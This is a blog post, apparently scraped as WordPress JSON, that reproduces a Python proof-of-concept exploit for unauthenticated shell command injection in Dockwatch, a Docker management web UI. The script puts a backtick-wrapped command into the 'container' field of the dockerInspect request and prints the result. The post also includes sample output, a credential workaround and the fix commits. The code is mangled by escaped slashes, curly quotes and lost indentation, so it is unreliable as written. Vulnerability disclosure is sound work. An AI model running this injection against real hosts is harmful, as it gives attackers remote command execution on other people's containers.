#!\/usr\/bin\/env python3
# -*- coding: UTF-8 -*-
#
# dockexec.py
#
# Dockwatch Remote Command Execution
#
# Jeremy Brown [jbrown3264\/gmail] \/ Sept 2024
#
# Intro
#
# Dockwatch is a container management web UI for docker. It runs by default
# without authentication, although guidance is available for how to setup
# credentials for access. It has a Commands feature that allows a user to
# run docker commands such as inspect, network, ps. Prior to fix, it did not
# restrict input for parameters, so both ‘container’ and ‘parameters’ for the
# ‘dockerInspect’ command were vulnerable to shell command injection on the
# container as the ‘abc’user with (limited) command output.
#
# Example
#
# $ .\/dockexec.py http:\/\/host:9999 “id”
# uid=1001(abc)
# gid=131(abc)
# groups=131(abc),281(unraiddocker),1000(users)
#
# Workaround: echo “admin:[a-FANTASTIC-password]” > \/config\/logins
# * DO NOT DO THIS: echo “” > \/config\/logins (* unless you want spacebar to work for user\/pass)
#
# Fix: see commits 23df366 and c091e4c, kudos for maintainers for quick fixes
#<\/p>\n
import sys
import requests
import re<\/p>\n
def clean_output(output):
output = output.replace(‘[]’, ”)
output = re.sub(r’Error: No such object:\\s*’, ”, output)
output = output.replace(‘command’, ”)
output = output.replace(‘test\\n’, ”)
lines = [line.strip() for line in output.split(‘\\n’)]return ‘\\n’.join(lines)<\/p>\n
def send_command(url, command):
endpoint = f”{url}\/ajax\/commands.php”<\/p>\n
data = {
‘m’: ‘runCommand’,
‘command’: ‘dockerInspect’,
‘container’: command,
‘parameters’: ‘test’, # also affected
‘servers’: ‘0’
}<\/p>\n
try:
response = requests.post(endpoint, data=data)
response.raise_for_status()<\/p>\n
match = re.search(r'<pre[^>]*>(.*?)<\/pre>’, response.text, re.DOTALL)
if match:
output = clean_output(match.group(1))
if output:
print(“%s” % output)
else:
print(“No output found.”)
else:
print(“No output found in the response.”)
except requests.exceptions.RequestException as error:
print(“An error occurred: %s” % error)<\/p>\n
if __name__ == “__main__”:
if len(sys.argv) != 3:
print(“Usage: %s <url> <command>” % sys.argv[0])
sys.exit(1)<\/p>\n
url = sys.argv[1]command = “`” + sys.argv[2] + “`”<\/p>\n
send_command(url, command)<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/env python3# -*- coding: UTF-8 -*-## dockexec.py## Dockwatch Remote Command Execution## Jeremy Brown [jbrown3264\/gmail] \/ Sept 2024## Intro## Dockwatch is a container management web UI for docker. It runs by default# without authentication, although guidance is available for how to setup# credentials for access. It has a Commands feature that allows a user to# run …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59750","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59750","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59750"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59750\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59750"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59750"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}